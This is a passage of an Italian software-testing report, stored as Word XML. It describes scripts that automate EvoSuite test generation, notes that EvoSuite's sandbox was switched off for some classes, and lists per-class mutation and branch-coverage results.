    </w:p>
    <w:p w14:paraId="7A89CD20" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBF57D7" w14:textId="74EC1A54" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:r w:rsidRPr="00715086">
        <w:t>TEST PASSED : 23</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>TEST FAILED : 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0BED9" w14:textId="6777D3D4" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:t>Per Randoop molte classi presentano un solo livello nonostante le modifiche fatte, per questo motivo potrebbe essere utile modificare il criterio con il quale vengono generati i livelli.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40447416" w14:textId="77777777" w:rsidR="00A710E8" w:rsidRPr="00715086" w:rsidRDefault="00A710E8" w:rsidP="0055772E"/>
    <w:p w14:paraId="5A72078F" w14:textId="2AEE4345" w:rsidR="001F60C0" w:rsidRPr="00715086" w:rsidRDefault="001F60C0" w:rsidP="001F60C0">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc148195757"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>5.2.2 Report EvoSuite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="765D5BD2" w14:textId="4A11B8E5" w:rsidR="001F60C0" w:rsidRPr="00715086" w:rsidRDefault="005E1D13" w:rsidP="006045F0">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Per avviare la generazione dei test EvoSuite è necessario lanciare il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">robot_generazione.sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">con i parametri corretti per ciascuna classe, per evitare questa operazione ripetitiva è stato realizzato uno script </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">evosuite_test_script.sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">che automatizza questo processo. Tale script non richiede alcun parametro e nel momento in cui viene lanciato avvia la generazione dei test per ogni classe presente nel repository non ancora testata, in particolare </w:t>
      </w:r>
      <w:r w:rsidR="00612F90" w:rsidRPr="00715086">
        <w:t>va a vedere se esiste il file CSV per ogni class</w:t>
      </w:r>
      <w:r w:rsidR="001C103B" w:rsidRPr="00715086">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00612F90" w:rsidRPr="00715086">
        <w:t xml:space="preserve">, se si allora lancia il comando </w:t>
      </w:r>
      <w:r w:rsidR="00612F90" w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>robot_generazione.sh</w:t>
      </w:r>
      <w:r w:rsidR="00612F90" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> seguito dai parametri per quella classe, altrimenti la salta. Si è scelto di generare 3 livelli per ogni classe in modo da valutarne l’andamento crescente (N_LEVELS = 3 in </w:t>
      </w:r>
      <w:r w:rsidR="00612F90" w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>evosuite_test_script.sh</w:t>
      </w:r>
      <w:r w:rsidR="00612F90" w:rsidRPr="00715086">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F79D2A" w14:textId="37246246" w:rsidR="001C103B" w:rsidRPr="00715086" w:rsidRDefault="00D826F5" w:rsidP="006045F0">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Molte delle classi da testare non erano inizialmente utilizzabili poiché contenenti operazioni non sicure (unsafe operation) per EvoSuite. La causa di ciò era il Security Manager di EvoSuite </w:t>
      </w:r>
      <w:r w:rsidR="001C103B" w:rsidRPr="00715086">
        <w:t>un componente che aiuta a garantire la sicurezza durante il processo di generazione ed esecuzione dei casi di test, è progettato per impedire che i test generati danneggino o compromettano il sistema in cui vengono eseguiti. Il security manager può essere configurato per imporre restrizioni sulle operazioni che un caso di test può eseguire, ad esempio può impedire l'accesso a risorse critiche del sistema, limitare la capacità del caso di test di leggere o scrivere file o di accedere a reti esterne. Talvolta, come in questo caso, può essere necessario disabilitare (o comunque depotenziare) il security manager, poiché troppo restrittivo, per eseguire casi di test che richiedono operazioni più avanzate.</w:t>
      </w:r>
      <w:r w:rsidR="001C103B" w:rsidRPr="00715086">
        <w:br/>
        <w:t>Il security manager è stato disabilitato aggiungendo l’opzione “-Dsandbox=false” al comando per lanciare EvoSuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491239DA" w14:textId="5B42305E" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="001C103B" w:rsidP="00CA32F0">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Così come per Randoop anche per EvoSuite è stato </w:t>
      </w:r>
      <w:r w:rsidR="00387909" w:rsidRPr="00715086">
        <w:t xml:space="preserve">realizzato uno script python “randoop_report.py” per la creazione del report dei test generati. Questo script è molto simile a quello di Randoop, le uniche differenze stanno nel fatto che questo estrae informazioni provenienti da file CSV (invece che XML) e utilizza come metriche di copertura </w:t>
      </w:r>
      <w:r w:rsidR="00644994" w:rsidRPr="00715086">
        <w:t>WAEKMUTATION e CBRANCH</w:t>
      </w:r>
      <w:r w:rsidR="00CA32F0" w:rsidRPr="00715086">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA32F0" w:rsidRPr="00715086">
        <w:br/>
        <w:t>Di seguito è mostrato l’output del report (contenuto anche nel file evosuite_report.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D093266" w14:textId="77777777" w:rsidR="00BE23CF" w:rsidRPr="00715086" w:rsidRDefault="00BE23CF" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E640DE5" w14:textId="2A23087B" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ByteArrayHashMap: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75B128" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.704, 0.9181, 0.9645]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A1064" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.6265, 0.9157, 0.9398] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D03613" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB775C1" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ByteVector: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D5AE2" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.7082, 0.8289, 0.8616]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582BFE31" w14:textId="5405CABC" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.3478, 0.5652, 0.5652] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06486458" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCB2276" w14:textId="77777777" w:rsidR="007935E6" w:rsidRPr="00715086" w:rsidRDefault="007935E6" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC38042" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Calcolatrice: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291C3161" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.945, 0.9817, 0.9908]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCB706" w14:textId="3387385C" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.7857, 0.9286, 1.0] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600D2F8" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B963612" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FontInfo: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA54906" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.6409, 0.9455, 0.9591]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF4803" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.3667, 0.9, 0.9333] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61FA94" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D6C48D" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FTPFile: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F2553" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.8736, 0.9916, 1.0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55879B4C" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.6615, 0.9077, 0.9846] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CEC8D" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202BCCCB" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HierarchyPropertyParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C4D0E" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.7925, 0.9363, 0.941]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5939A" w14:textId="18AA7B44" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.5273, 0.6273, 0.8727] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2C7BF8" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479CD134" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HSLColor: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612983F" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.7423, 0.9197, 0.9472]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267995A" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.6056, 0.8028, 0.8732] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56746DE4" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA8B678" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ImprovedStreamTokenizer: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226CEFFD" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.9658, 0.9752, 0.9845]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47429B0E" w14:textId="5F47AD41" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.4082, 0.7959, 1.0] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61434B70" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB20258" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ImprovedTokenizer: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110D112" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.7658, 0.9649, 0.9859]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE540C" w14:textId="5BCE7060" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.6049, 0.8272, 0.9877] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB3A89" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C615C01" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Inflection: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E138215" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.9315, 0.9589, 0.9589]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7232E1" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.7407, 0.8889, 0.963] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944DDB8" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31FA892D" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutputFormat: TEST FAILED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736D5910" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Weak mutations: [0.6728, 0.9706, 0.9632]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E67A6" w14:textId="19BA03F2" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cbranches: [0.5522, 0.8507, 1.0] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B3241" w14:textId="77777777" w:rsidR="00CA32F0" w:rsidRPr="00715086" w:rsidRDefault="00CA32F0" w:rsidP="00CA32F0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
